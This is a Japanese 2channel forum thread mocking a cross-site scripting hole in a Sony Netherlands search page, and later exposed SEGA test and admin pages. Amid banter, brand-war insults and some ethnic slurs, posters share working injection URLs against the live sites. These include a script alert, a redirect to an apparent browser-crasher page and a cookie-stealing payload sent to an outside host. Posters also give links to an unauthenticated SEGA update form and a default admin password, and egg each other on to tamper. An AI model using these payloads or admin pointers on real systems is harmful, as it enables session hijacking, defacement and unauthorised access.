【速報】ソニーのサイトにヤバい脆弱性

踏むとソニーのロゴが任天堂になって表示される
http://bit.ly/iOB1JN

クロスサイトスクリプティング (Cross Site Scripting) とは、動的にWebページを生成するアプリケーションの
セキュリティ上の不備を意図的に利用し、狭義にはサイト間を横断して悪意のあるスクリプトを混入させること。また、それを許す脆弱性のこと。

http://ja.wikipedia.org/wiki/%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0

またか

き…脆弱性

怖くて踏めない

き・・・脆弱

も、脆弱性

パソコン蛾ぶっ壊れた

ぜ

踏んじゃったんすけど（わらい

ソニーのサイトにXSS
http://hatsukari.2ch.net/test/read.cgi/news/1304763288/

気弱性

お・・・脆弱性

なんかURLが

モロの性に弱いって男ならみんなそうだろバカにしてんのか。

こんなことをする奴は一体どこのハッカーだ

弱すぎワロタ

短縮urlでスレ立てとか調子に乗りすぎだろ
死ね

ソニー大丈夫かよ

もうソニーはゲーム事業から撤退しろよ
セガが代わりに来い

ラベル低いな

もっと詳しく

ソニーのびじゃくせい突き過ぎだろｊｋ・・・・

踏めないから誰ｋあスクショよろ

>>9
どうなったの？

もうボロボロやないですかー

福留のHPがハカーされたのと同じ様なことでいいの？？？

あ……脆弱性

情弱性

きじゃくせい（←何故か変換できない）ばっかだなソニーはｗｗｗ

踏んでみたいと思いませんか、ふふっふー

http://beebee2see.appspot.com/i/azuY1uL4Aww.jpg

クソワロタ

踏んだけどこれは大丈夫だよね？

実はSONYって任天堂だったんだな

定型レスうぜえ死ね

ノーマライズだっけ？ そんなことも出来ない会社によくゲームが作れていたな

これなんでもできそうだな

>>1のURL調べたけど
http://www.aguse.jp/?m=w&url=http%3A%2F%2Fbit.ly%2FiOB1JN&x=49&y=8

検索結果に<style>#logo{background-image:url(http://www.nintendo.co.jp/img/logoNintendo.png
) !important;widthpx !important;</style>&x=19&y=20

っての突っ込んで任天堂のロゴ表示させてるな

ソニーもう駄目だなｗ

ソニーちゃんはうまれつききじゃくせいだらけのかわいそうな子なんです＞＜

SQLインジェクションとかXSSとか脆弱性の博物館かよ…

http://www.nintendo.co.jp/img/logoNintendo.png

ｷﾞｼﾞｭﾂｶﾞｰｷﾞｼﾞｭﾂｶﾞｰ

またもろじゃくせいの話かよ

>>31
　　　＿＿＿ 　　　ｺﾞｷｯ　
　　/　||￣￣||　＜⌒ヽ )) 　
　　| 　||＿＿||　＜　 丿　　　
　　|￣￣＼三⊂/￣￣￣/
　　|　　　　|　( ./　　　　 /

PS3⇒幹部が朝鮮人⇒脆弱性放置

360⇒中身が朝鮮製⇒故障

>>19
セガ氏ね

>>37補足
あと>>1の飛び先はどっかのブラックリストサイトにフィッシングって認定されてる

ふぁ･･･脆弱性

漫画のようにマヌケな企業だな

この間の２０００人といい、これといい、
ネット規制の法案なんかができてきて、
ソニーのＨＰ見るだけも、何がアウトで何がセーフなのか正直わからん

もう日本ってネタ国家だな

お笑い大国日本

prepareするだけで防げるだろうに。

http://www.nintendo.co.jp/img/logoNintendo.png
http://www.nintendo.co.jp/img/logoNintendo.png
http://www.nintendo.co.jp/img/logoNintendo.png
http://www.nintendo.co.jp/img/logoNintendo.png
http://www.nintendo.co.jp/img/logoNintendo.png
http://www.nintendo.co.jp/img/logoNintendo.png
http://www.nintendo.co.jp/img/logoNintendo.png
http://www.nintendo.co.jp/img/logoNintendo.png
http://www.nintendo.co.jp/img/logoNintendo.png
http://www.nintendo.co.jp/img/logoNintendo.png
http://www.nintendo.co.jp/img/logoNintendo.png

脆弱性



ちょｗｗｗｗ
atokできじゃくせいって打ったら脆弱性の謝りって出てちゅあんと変換できたｗｗｗｗ

すげええｗｗｗｗｗｗｗ

これじゃき・・きじゃ（ｒｙ変換できないなんてレスできねえな

NoScriptが見事に「XSSの危険性のあるアクセスを遮断しました」と遮断してくれた

ナニコレ？
痴漢や妊娠のハカーがソニー集中攻撃してるって事？

マジかよゴキブリオーバーキル

>>44
そのAA好きだｗ

>>55
もろじゃくぜいだろ？

笑えてきた

NoScriptさんはちゃんと検知してくれるね

マジレスするとログインサイト以外のXSSはそんなにやばくない。
ログインサイトだとXSSからクッキー盗んでセッションハイジャックできる場合があるけど。

も、もろよわせい！

ただ単にjavasceiptでid指定して背景画像変えてるだけだろ。
俺が他のサイトでやってやろうか？

あ、ログインサイトだったマズいわこれ

ほんと糞すぎるなw

ハードとソフトの融合（笑）

>>17
短縮URLじゃなきゃ面白くないネタだからなあ

いまどきクロスサイトスクリプティングて、ソニーはマジでクソ企業じゃん。
被害者もクソもねえわ

ソニーのセキュリティガタガタって事ですかな？

オレの最新ATOK2011ではきじゃくせいなら変換できたが
もろじゃくせいは変換できなんだ・・・

ｽｰﾊﾟｰﾊｶｰ必死だな

ソニー信者ってなんかスタイリッシュでかっこいいイメージなんだけど任天堂信者って豚ってイメージ
はいはいGK乙ですよ

すでにフィッシングに利用されてるかもな

検索結果
http://goo.gl/ot8kW

XSS対策もしとらんのかw

戦後日本企業の象徴が落ちぶれてどんな気分よお前ら

こんなんでよくネットで稼ぐとか言えたな
技術の技の字も知らん上層部が妄言撒き散らしてたのか

サニタイジングぐらいしっかりしろよ

ソニーは任天堂だったのか

ソニーのファイヤーウォールって紙切れか？ｗ

ソニーちゃん可愛そう…
スーパーハカーはソニーちゃんに何の恨みがあるんだこの野郎

グロサイトと理解して踏むよりもこのサイトを踏む方が怖い

さすがハッカーの交流サイトだな

>>82
WAFを使ってないのは確かだろうねぇ

>>76
俄然信頼できるサイトになった

ソニーフルボッコｗ

任天堂と合併かぁ

ソニーを攻撃しているのが妊娠だったことが証明されたな

え、URLに打ち込んで表示変えてるんじゃなくてフォームに突っ込んでそれが表示されてんのかよ。

よし、誰かshow databaseとかやれよ。

またN速のｽｰﾊﾟｰﾊｶｰの仕業か

>>63
マジレスすると
ログインしないで使える方がやばい
誰もがターゲットになるから

ソニーのレス多いな。
任天堂吹いた

ソニーは本ｔに屑だな
さっさと潰れろよこんな糞会社

NoScript使ってる人結構いるのね
重くない？

ソニーのセキュリティは犯罪レベル

ソニー「ｱﾉﾆﾏｽｶﾞｰ」

またもろじゃくせいか！

なんだこの糞サイト（滝汗）

>>76
これは信頼できるサイト

ソニー大敗北

>>46
GK乙

スーパーハカー板のものですが電源ひっこぬいたら解決しないの？

ゲームなんか意味ねーから止めろｗ
今回も海外のゲハ豚が原因だろｗ

　　　　　.SCE
　　　.／　ノヽ＼
　 　 ;| （○）（○|:
　　　:|ヽ (_人_)/;
.　　　:|　|. ⌒ .|; 　　　 も…やめ…
　　　 :h　　 ／;
　　 　 :| 　/; ’
　　　 /　く､　　 　 ＼
　　　;|　＼＼_　　　　＼
　　　;|ミ　|`ー＝っ 　 　＼


　　脆　　弱　　体　　質

こういうことか
http://goo.gl/V15Yt

どうでもよすぎワロタ
寧ろ宣伝になるだろこれ

次から次へとｗｗｗ

ぶっちゃけ潰れんの？

なんで日本人は集団訴訟起こさないの？アメリカでは既に最大800万の保障決めたみたいだよ

あれ？ソニーって確か大企業だったよね？

　　　　　　　　　　　　　　　　　　ヽ人人人人人人人人人人人人人人人ノ
　　　　　　　　 ／￣(Ｓ）~＼　　＜個人情報を不特定多数に公開する＞
　　　　　　　／ ／ ∧ ∧＼ ＼＜　　　極めて悪質な犯罪である！　　＞
　　　　　　　＼ ＼( ﾟД,ﾟ ) /　/＜　　　　　法的措置も辞さない！　　　＞
　　　　　　　　 ＼⌒　　⌒　/　　ノ Y´｀Y´｀Y´｀Y´｀Y´｀Y´｀Y´｀Y´｀Y´｀Yヽ
　　　　　　　　　　）_人＿ ノ 　
　　　　　　　　　 /ソニー/
　　　　　 ∧＿∧ ■□ （　　　　）)
　　　　　（　　　； ）■□ ￣￣ヽ
　　　γ⌒　　　⌒ヽ ￣￣ﾉ　 ﾉ
￣￣￣￣￣￣￣￣￣￣￣|

ｿﾆｰのｲﾝﾀｰﾈｯﾂ事業はおわり

>>111
アメリカには集団訴訟制度(クラスアクション)がある
日本には無い

SONY終わり過ぎワロタ

>>110
少なくとも現場で作業している下っ端は潰れるな。
報告あるごとに対処しなきゃならないから、寝てる暇もないだろうし。
でも、ストリンガーとかはぐっすり寝てるんだろうけど。

>>96
GENOが流行ってから入れたわ

http://tinyurl.com/3p63ylv

fsr

一連の騒動でソニー関連のネットワークの脆弱性探しまくってるやつが世界中にたくさんおるんやろなｗ

>>44
右にかしげろよ

き…脆弱性……
http://www.youtube.com/watch?v=f_YYEx7l65U&feature=player_embedded

ライブドア以下だねぶっちゃけ技術力は。製品開発も中国丸投げで本社は
バカばっかになってんだろうな。

ソニーに「犯人はアノニマスじゃなくて任天堂だった！」って言ってほしい
一周回って爆笑するから

良かったじゃんSONY、みんなバグ出ししてくれてるぞ

>>121
だろうなw
俺も複数のヤバいやつ見つけてIPAに報告したよw

てか、いつになったらPSNは復活すんだ糞ニー
いい加減にしねーと箱に乗り換えんぞ

ソニーはネットで下らん宣伝工作ばっかりやってて、金のかけどころを完全に
間違ってる。

完全に遊ばれてますねｗ
漏洩の方に直接手下したのは中華系臭いけど

検索したい言葉を渡すときって「<」「>」とかもそのままなん？

ソニー始まったな

ベーコンみたいなもん？

一方、スクエニはデバッグすら有料でやらせるのであった。
ソニーはみんなが無料でやってくれるから良かったじゃんｗ

　　　＿＿＿ 　　　ｺﾞｷｯ　
　　/　||￣￣||　＜⌒ヽ )) 　
　　| 　||＿＿||　＜　 丿　　　
　　|￣￣＼三⊂/￣￣￣/
　　|　　　　|　( ./　　　　 /

犯人は妊娠

え？
短縮URLの上にマウス乗せるとリンク先出ないの？
どんな情弱だよ

>>134
デバッグの報告したら訴えられるぞ

こんなしょーもないことして逮捕とか
チカニシの人生って何なんだ

妊娠てめー

saku

ソニーになりすましてURLをメールで
省庁とかに送りつけて
パスワードとか抜こうと試みる輩も出てくるんじゃねえの
これ放置してると

ｿﾆｰのﾊﾞｸﾞは
個人情報を皆が知ってる方法で漏れださせたり
個人情報を公開するようなﾊﾞｸﾞばかり

ストアは…まだ無理か

たいしたことない

さすがスーパーハカーが集まるｖ速だけあるわ

>>138
そういえばそうだった。
でも、ソニーじゃなくてIPAとかに教えてあげればいいのか。

SONY潰れるんじゃないの

日本じゃ、セキュリティ技術者って、土方ITカーストの中でもほぼ最底辺に位置付けられてるしな
ここでも軽んじられてたんだろうな。その結果、既存の脆弱性にも対応できず・・・・

もうやめて！ソニーの体力は（ry

っていうかこの脆弱性は別にソニーに限ったものでもないと思うが

スマフォで踏んだから安心＾＾b

ソニーの電子書籍の店は大丈夫なのか

>>151
で？っていう

汚いなさすが任天堂きたない

流石スーパーハカーだなおまえらｗ

大丈夫wだと思うやつがｿﾆｰのｲﾝﾀｰﾈｯﾂのお店を利用すればｲｲｗ

踏んだらまたソニーに難癖つけられるんだろ、あの極悪企業ヤクザ並だわ(´･ω･`)

ぼっさんないぞ

これってまだ攻撃を受けているって事？

>>160
自滅してるってこと

風評被害

”　←この記号さえつかわなきゃなんでもありだな

ここまでひどくないだろと高をくくっていたが、
マジでソニスタ抜けてこよう…
マイソニも抜けてこよう…

工ｴｴｪｪ(´д｀)ｪｪｴｴ工
いいからPSN早く復旧してくれよーーーー！

検索結果の部分にコードをそのまま埋め込まれてるんだな
自分好みのサイトに出来るわけか

さすが技術のソニー

もうネット事業辞めちまえよ

マジかよゴキブリ息してない

>>149
原発もそうだけど、日本はセキュリティをコストと考えるクソ社会だからね。

世界の嫌われ者チョニーｗ

なんでこれもう一回立て直したん？

>>149
日本のサイトは脆弱性ばっかりだからな
サイバー戦争が起きたら真っ先にやられる

踏んでいい？

>>173
それはもうやられ放題だと思ったが

怖い人用
http://a001.aguse.jp/images/img/27c0d92ef014a59c041afa2e382e4271d95c82fd/d93d6dfb4d50b2260c147e147d63d866894c3bcd_00_x.png

>>174
踏んでもなんら問題なし

ソニーのサイトを開いたと思ったら任天堂のサイトを開いていた・・・怖い

ソニーよかったなタダでペネトレーションテストができて

>>175
金にならない(乗っ取りできない)程度の脆弱性や誰かの操作が必要な脆弱性は大量に残ってる

Webのセキュリティって、常に新しい方法考えてる専門家がいるわけ？

東日本が見つけたのか、よくオランダのサイトなんか見つけてきたな

>>181
居るよ。最近だとHTTP Parameter Pollutionってのが出てきた。

http://www.sonyproductinformatie.nl/main/search.php?searchfield=%3Cmeta+http-equiv%3D%22refresh%22+content%3D1%3Burl%3Dhttp://www11.atpages.jp/burakura/burakura/test2.html%3E&x=0&y=0

searchfield=<a href=https://www.hellowork.go.jp>未公開！最新ゲーム特集！！！</a>

>>119
モペさん・・・

http://uploader.sakura.ne.jp/src/up38766.jpg

>>184
おいこら、それは流石に怖いだろうが。

もう元に戻ってんじゃん

ゲーム事業お荷物すぎだろ
もう潰せ

ソニー生命とか保険とか即解約しないといけないレベル

AV事業のネットワークの根幹に組み込んでしもたからもうゲーム事業だけの問題でもない
そしてこれ進めたのストリンガー会長だったりする、つまり責任問題になるとソニーのトップの首が飛ぶ

>>190
生命は…うん、あれ、>>127

>>173
サイバー戦争なら去年やったでしょ

きじゃくせい

糞ニー
↓
リテラシーの低い間抜けWeb担当者
↓
大手広告代理店
↓
中小広告代理店（複数）
↓
下請けWebサイト制作会社

なるほどそういうことか
http://www.sonyproductinformatie.nl/main/search.php?searchfield=%3Cimg+src%3Dhttp%3A%2F%2Fimage01.wiki.livedoor.jp%2Fb%2Fi%2Fbr_wiki%2F0ae712d9.jpg%3E&x=0&y=0

>>1
JS使ったその手のトリックは、ひょっとするとおまえが事情を聞かれることになるかもしれない。

F5砲ばっかりの戦争なんて・・

ソニーはなんでこんなことになっちゃったの？

エスケープシーケンスもわからないソニーちゃんかわいい！

なんかソニー大丈夫か？
脆弱性が完全になくなって100%安全になるなんてことはないから他の大手企業でも
ハッカー集団にふるぼっこにされたら同じようになんのか？

>>193
去年は知らんが、日本はロシアに負けると断言できる。
中国になら勝てそうな気がするけどな。

>>201
こんだけ世間で騒がれてセキュリティの総ざらいやってないようならもう駄目かもしれん
どこぞの肉の販売会社みたく2年ぐらい肉のチェック怠ってたとか普通にあっていい業界じゃないんだけどなー

脆弱性

form要素がかぶると優先されるのがなんとかかんとかとか
javascriptでhtml変えてログイン状態でinput要素押したら送信先がゴニョゴニョでなんとかかんとかが奪われちゃうとかなんとかかんとか

>>202
F5戦争で人口ランキング世界一位の中国に勝てるはずがない

>>206
ネット環境ある人口はそう多くないんじゃないかな、中国は

>>207
そうだった
それを忘れていた

かっこ悪いのう。かっこ悪いのうソニー。

>>206
いざとなりゃ海底ケーブルの帯域絞っちゃえば良いし

飯野を思い出した。

>>208
それでもネット人口は1億人以上だぞ

これってソニーのサイトでなんか入力してたと思ったら
実はフィッシング詐欺サイトに内容飛ばされてたみたいなのができちゃうって事？

ソニー技術力ゼロじゃん

>>213
そういうのもできる。
けど、セッションハイジャックのが危険だと思う。
サイトにログインしていた場合、ハッカーがログイン状態を乗っとることができる。

苺を食わば皿まで

ソニー糞杉ワロタｗｗｗｗ

該当部分教えてくれたら30秒で直してあげるから雇ってよ

雇ってもいいけど
治ったら首だよ？

>>218
逆に告訴するのがソニーなのをしらんのか？
アノニマスを怒らせた発端でもググれ

クロスサイトスクリプティングって、アプリファイアウォールとか入れてないの？

>>221
WAF入って無さげ

>>215
それは凄いな
ソニーこれどうするんだべ

直してあげると書いたら脅されたでござる

>>220
しかもあれアメリカだから事なきを得たわけで
日本だとガチで逮捕されて億単位の賠償金通るだろうね

JavaScriptは通らないみたいだなぁ。

これはｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

ソニー大変だな
がんばれよ
あとヘッドホンだけ作ってればいいよ

ずさんだねえ
流石にひどすぎる

根本的な問題が多すぎるな

ソニーが傍若無人でプライドだけが肥大化した奇形だからねｗ

任天堂逃げてええええ

SONYおわったな

虚業が崩れる時は早いな
ライブドアを思い出す

ソニスタがやられてないならまだなんとかｗ
おもしろがって潰れろとか言ってても実際潰れたらやばいどころじゃない
日本ではかつてのソニーショックを超える大暴落、海外では某韓国企業がさらに幅を利かす
ゲーム事業も任天堂に集中したからって市場が拡大するわけでも活性化するわけでもない

今のソニーが潰れてもダメージなんて高が知れてる

>>226
動くじゃん
http://www.sonyproductinformatie.nl/main/search.php?searchfield=%3Cscript%3Ealert%284545%29%3C%2Fscript%3E&x=14&y=11

>>235
佐伯さんチーッス

セガとかもいいんかね、こんなもん見えるとこ置いといて。
http://sega.jp/cgi-bin/msearch/msearch.cgi

>>238
モンスターハンター３でPS3はグングン伸びる!!

セッションハイジャック
http://www.sonyproductinformatie.nl/main/search.php?searchfield=%3Cimg%20onerror=location.href=%26quot;http://2ch.net?%26quot;%2bdocument.cookie;%20src=http://google.com%3E&x=19&y=20

これは家の窓開けっ放しでセックルしてるレベル

>>53
XSSは関係ないでしょ

>>237
最近のまともなブラウザだと動かない

>>237
とりあえずChromeでは動かんかったよ。
お前のブラウザ危ないぞ。

>>1
全然見えないんだけど

chromeは動かんけど、firefox4では動いた(>>241)
chromeはurlにあるjavascriptを実行しないらしい

>>239
何これ個人が作ったもの？

>>247
対症療法としてはいいかもしらんけど
いつものこととはいえ、
また無茶な仕様だなｗ

ソニー関連のサイトは先日の件といい、古いファイルも
色々残ってたりするから、漁れば他にもザクザク出そう

>>249
POSTで送ればchromeの防御をbypassできるかも?

ソニーは任天堂が操っていたのか

>>251
jsファイルをgzip形式で固めて
.htaccessいじって
imgタグでリンクしてやれば
safari以外のブラウザで好き勝手出来るんじゃないのか
大丈夫か

ソニーグローバルソリューションズってこんなにレベルが低かったのか。

過去に何度も、外部から辿れるところへ個人情報を置いていたソニーだけの事はある

ワロタ

>>253
日本語でおk
外部スクリプトを使うという方法もあるけど、それも防御されてるだろ流石に。試してないけど

アノニマスじゃなく任天堂のロゴってことは・・・

>>258
マイクソの仕業だなｗ

ゲームじゃないんだからこう言うのはあかんよなー
マジSONYバカすぎ('A`)ｳﾞｧｰ

>>239
マズいんじゃね?
こんなもん見つけたけど何ぞこれ
http://sega.jp/report.html
http://sega.jp/report20091007.html

IEの8とかflash playerの9あたりだっけかな。
アラート出すだけでコピーしているテキストを取得できるんだぜ。
アラート内容見ても素人じゃわからんレベルの説明文だったから簡単にパスワードとか取れそうだと思った。

このサイトをテトリスに変える強者はおらんのか

これはワロタｗ

>>261
よくみつけるなそんなもんw
参考程度にどうやってみつけたか頼む。
俺もtestとかsampleとかで実験はしてるんだがうまくいかん。

リンク踏んだらPS3が当たった

>>245
おかしいな
Chromeだけど、うごくんだが
オレのなんかバージョン古いんかね

もういいよグーグル検索の裏技は

>>265
txtで検索したら出てきた。

こっちはstatisticsで検索して出てきた
http://sega.jp/rrdtool/index.html

>>269
あー、なるほどね。
せっかくサイト内検索あるんだから使えばいいのかそいつを。

週刊流出

俺しーらねっと。
こんなもんみんなに見えるとこ置いておくのが悪いんだぞ。
http://sega.jp/mill_test/syuusei.html

>>270
うん。でも、サイト内検索のインデックスが更新されて無さげであんまり面白くないな
genindex.cgiにアクセスして再インデックス化すればいいのだけど、まぁパスワードが必要で法的に無理だからここまでかな

便宜上BASIC認証すらかけていないのかもしらんけど、
robots.txt置いたり、ウェブマスターツールでURL削除したり
は最低限やっておけと…

>>234
ソニーに対するイメージって
「成功したライブドア」なんだけど…

まあそれもここで終わりか

何？ハッカーって任豚だったの？

日本の大企業ってなんでこうノーガード戦法ばっかりなの

またアナルマスにその弱いところを突かれるぞ

なんかもうオモチャにされてね？

>>276
本当にチカニシ卑怯だよな

>>272
やべーなこれｗ　やりたい放題できるじゃねぇかｗ

>>281
これどっちが悪いんだろう。
サイト内に剥き出しの管理画面を置いたセガか制作者なのか。

流石にゴールデンウイーク中にはpsn復旧すると思ってた

ぜ・・きょ・・・い・・・

<script src=http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.3/jquery-ui.min.js></script>
<script>$(document).ready(function(){$(document.body).children().each(function(){$(this).draggable()})})</script>

jquery uiのドラッグ移動
普通にjs追加して実行出来るわ

>>272
ちょｗ

話題逸らしにセガを利用しようとするのはやめてください。
あれだけ尽くしてくれている名越のいるセガを、保身の為の
話題逸らしに利用するとはあまりにも外道すぎるでしょう・・・。

お

>>212
検閲にひっかかるんじゃまいか？

>>282
何の認証も設置しなかった製作者
クロール対策すらしていない管理者
人材の入れ替わりが激しくサイト管理に必要な情報が情報共有されないゲーム会社の体制
全部悪い

致命的な脆弱性なのにスレが立たないセガさん・・・

>>272
これはあかん

life-xとかやばいかな？

き・・・脆弱性

>>272
Σ（￣□￣；）!!

次はなにがくるんだろう。

ああ、わかった。
セガは無題で検索するといっぱい出てくる。

>>272
なんなのこれ怖くて踏めないから教えて＞＜

セガの方は洒落になってなさすぎてスレ立てる気もおきないレベル

スレ立ててまでセガを叩きたいほど嫌ってるやつもおらんだろ。
誰かメールかなんかで教えてやれや。

おいTwitterで>>272の話してる奴やめろ

>>272大丈夫

セガを叩くヤツがいたら
僕が出て行ってやっつけるから覚悟しておくように

セガは元社員に結構恨まれているよ

>>272
記事古いし現在は使われてないのかな

>>298
セガの携帯版ホームページの情報更新用フォームにアクセスできる。

オカ板の予言の連鎖倒産の連鎖とはセガの事だったんだよ！

クロスサイトスクリプティングって久し振りに聴いたわ

>>306
Σ(ﾟДﾟ；)

なんだよ、もうどこも同じなのかよｗ

>>305
生きてんじゃねぇの？
見たところ今日の21:54分にもデータベース更新されてるっぽいし。

いやいやいや。

$_GET["any"] やら $_POST["any"] に htmlspecialchars すらかましてないクソ開発者がいる事がビックリだろ。

入社したてのアホに作らせたんかいな。

>>311
それはこのスレの誰かが更新したんだろｗ

今日の更新記録はお前らじゃねぇのかｗ？

問題ないと思ってボタン押しちまったわ

自分でやる度胸ないから、誰か>>272を弄ってみる人柱待ち

　 ∧＿∧
　（　・∀・） ﾄﾞｷﾄﾞｷ
　（　∪ ∪
　と＿_）__）

>>315
逮捕かあ…

ソニーって家電屋だもんしょうがないよね

>>313
ああ、そうなのか。
俺流石に更新はしてないわ。
更新したら流石にアウトかなーって思って。
けどURL貼ってしまったから俺もまずいんかな。
まぁ、置いておく方が悪いの一点張りするが。

すでにTOPのフラッシュが消されてるｗ

絶対にヤバいサイトにリダイレクトさせるなよ
絶対だぞ

>>312
技術者単独の問題でなく
ソースレビューすらしてないんかいっていう
QAは…QAはまあ気づかないかもわからんなぁ

ソニースレかと思ったらセガスレだったでござる

あとブラクラみたいになるから貼らんけどmill_test/test って打ったらめちゃくちゃ重いXMLでてきた。
パソコン壊す気か糞セガ。

今回の件で電凸したけど、当社は関係ないの一点張りだった。マジで糞だな


任天堂とかいう会社は

なんかヤバイかもしれんね
http://sakuraweb.homeip.net/uploader/src/up146598.png

セガ好かれてるなｗ CMに出てた専務が変なとこに再就職しちゃったけど関係ないぜ
グリーとかモバゲーなら祭りになるんだろうな

>>315
団地で間違って他人の部屋のドア開けちゃった所まではセーフかもわからんけど
玄関でオナニーしてた奥さんに挿入しちゃったら確実に犯罪だからな

>>326
やべぇよ・・・やべぇよ・・・

お前らのせいできじゃくせいって読んでしまう

さて、このシ管理ステム作ったのはanimanium.jpらしい。
そして検索エンジン作ったのはkiteya.net、ホームページ内全文検索エンジンmsearchというシステムらしい。

タゲが完全にセガに移ってるな。
GKの不意玉凄いですね＾＾

こんな状態だとハッカーがやる気出せば
Spyeyeとかいつでも大量の人に仕込まれそうだな

くじゃくせい

>>326
間違えても、トップページをThe Pirate Bayにかえたりするなよ？絶対だぞ？

>>272
おんぎゃあああああああワロタ

これVIPに貼ったら突撃するバカ多数で逮捕祭になるんじゃね？

>>272
これは駄目だろｗｗｗｗ
弄りたいけど怖くて無理だｗｗｗｗｗ

>>326
ｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

セガｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

バカすぎるｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

SEGAの中の人、早く対策しないと…

セガのホームページ検索エンジン作った人のブログかなぁ。
トップページからブログに飛べた。
現在も更新してるみたいだし足はついたな。

>>337
おいバカやめろwwww
絶対書き換えるやつ出てくるからwwww

逆に考えると
セキュリティを保護できる技術者も
それを見つけるハッカー的な技術者も
日本にはいない
ってことなのかね

>>337
VIPのガキを人柱にしようぜ

>>326
このページか
http://ryu-ga-gotoku.com/news/detail/411.html

>>337
逮捕祭りｗ

間違って踏んだらやだから
ν速に危ないurl貼るのやめろよ

GKは、セガを犠牲にしてでもソニーを守らなくてはならんのだ。

任天堂とM＄もなんか脆弱性ありそうだな

>>343
そゆこと。BlackHat Japanも中止になったしな。

>>332
正直なところ、ソニーの方はある程度知識ないとそうそう悪用できないｋど
途中から出てきた>>272があまりにもユーザーフレンドリーで内容を更新（改ざん）できるからヤバい
ソニーの>>1が町内の祭りだとすれば、>>272はテツトモがゲストで呼ばれるレベルのフェスティバル

>>343
日本の治安の良さがこういうネットで裏目に出てるのかもな
カバンで席取るのと同じで誰も盗んだりしねえだろってどこかで思ってたのかも

セガを生贄に、「ソニーの盾」を召喚するっ！！

ソニーはもうアノニマスに頭下げて中の人になってもらった方がいいんじゃないか

玩具すなあ

http://nurseangel.fc2web.com/psp/img/20061025-01s.jpg
http://nurseangel.fc2web.com/psp/img/20061025-02s.jpg
http://nurseangel.fc2web.com/psp/img/20061025-03s.jpg
http://nurseangel.fc2web.com/psp/img/20061025-04s.jpg

今こそ、この人が必要なとき

何となくだけど、少し状況が分かった。
過去にテスト用に作ったページを消さずに放置して、それがサイト内検索で拾えるのか。

http://sega.jp/cgi-bin/msearch/msearch.cgi?index=&config=&set=1&num=30&query=test
http://sega.jp/report20091008.html

ソニーのサイトはもう怖くて踏めない
なんか感染したら困る

>>272
せめてBASIC認証くらい…

>>31
Firefoxだとブラウザ側でXSS排除して見れなかったが、そう見えてたんだなｗ

>>329
ソニー社員はホモだった・・・？

http://www.kiteya.net/script/msearch/users.html

この検索エンジン使ってるリスト。

ハッハー、俺もうしらねぇぞぉ！

これセガはただのアホだろ

ソニーもただのアホよ

>>358
カジュアルハックは防げるからな
BASIC認証もDIGEST認証も弱いけど

>>355
一枚目原発事故の犠牲者とかかと思った

日本企業はオワコン
ソニーごときじゃアップル、MS、グーグルにはなれませんでした

>>361
> [ださいたま市]
> [社会民主党政策審議会]
> [ソニー教育財団]

まさかのソニー繋がり

何度目だ(´･ω･`)

>>364
弱くても不正アクセス禁止法が有効になる。
認証なしじゃどうにもね。

>>356
リンクが無くて外部からの検索(Googleなど)では拾えないものでも、
内部からの検索では拾えるからな。

またGK法務部来るかなw
ってか、その流れでアンドリューライアン来たら
絶対に許さない。アクセス手段少ねえんだからマジ勘弁。

これは管理者の責任

脆弱性…あぶなじゃく？

>>237
わろた

ほらよ

http://sega.jp/pc/soft/sakatsuku/beta/index.html
お知らせ
私のホームページはいかがでしたか？
お気軽にメッセージをお書きください。

　■ へらへら
Date: 2002-12-11 (Wed)

えへへ〜
　■ ふふふ
Date: 2002/12/11(Wed) 11:43

うひょひょひょひょ

たしかに
利益>リスク
なところが多々あるからな
日本人の温厚な性格もあるし

いったんトコトンまでやられて
意識改革した方がいいのかもね

雌ブタ「とほうです（ｷﾘｯ！」

>>375
ｗ

>>375
なにこれ？どういうこと？

やっちまったのか？

ちょっとヤバそうなの見つけたけど黙ってよう

msearchとやらのマニュアル読んだらこんなもん出てきた。

http://sega.jp/cgi-bin/msearch/genindex.cgi

どうすんの？セガさん。

OH MY GOD

>>382
黙っててあげたのに…

>>382
>>273で書いたけど、パスワード入力が必要

PSUでちょっとは懲りたかと思ったら全然そんなことはなかったな

>>382
パスワード認証っぽいから、さすがにこれを突破したら
ワッパもんになるからやめた方がいい

>>382
> 生 のパスワードデータを送りますので，グラブされる可能性があります．

送るなや(´･ω･｀)

>>385
ああ、本当だ。
スマン。
またなんか探してみるか。

ちなみに標準のパスワードはこうなってる。
$g_password = "msearchpass";
けど、さすがパスワードは変更してるはず。

>>390
　正直、試してみたいんだろ？
　セガの危機管理能力がどんなものかって
　　　　　　　 ＿＿__
　　　　　　／　　　　＼　　　　　　 　　 標準パスワードが変えてないわけないお！
　 　 |＼／　　ノ' ヾ　　＼／|　　　　　やるだけ無駄だお！
　　　|／ ≪�@>　 <�@≫ ＼|　　　　 　　　　　　⊂ニニ⊃
　　　|　　 　 （__人__） 　　 　|　 　　　　 　　　　　＿＿＿_ﾉ Ｌ
　　　 ＼、 　` ＾＾＾＾ ´ 　,／　　　　　　　 　　 ／＼　／　 ⌒
.　　　／ ヾ 　｀ー‐"　"　⌒ヽ　　　　 　　　 ／（○）　（○）　＼
　　 / 　 　 　 ヾ ,"　　　　　　＼　　　 　 ／　　 （__人__）　　　 ＼
　　 | 　 r　　　　　　　　　r＼,"⌒ヽ　 　|　 　 　　|::::::|　　　　　　|
　　　::::::　::;;::　　,,,　;;:::　,,::;;;;::::''　 　　 　　＼　 　 l;;;;;;l　　　 　／l!| !
　　　 ::::;; ::::::: ;; ::::　::::::::;;;::::::::;; γ⌒⌒／　　　`ｰ'　　 　　＼⌒⌒ヽ
　　　　　::::::::;;::::::;; :::::::;;;::::: 　　　 （_ノノ／　　　　　　　　　　ヽ !l　ヽしし_）
　　　　　　　:::::::::::;;:: ::::::::　　　　　　 （　　 丶- 、　　　　　　　　　　 しＥ　|
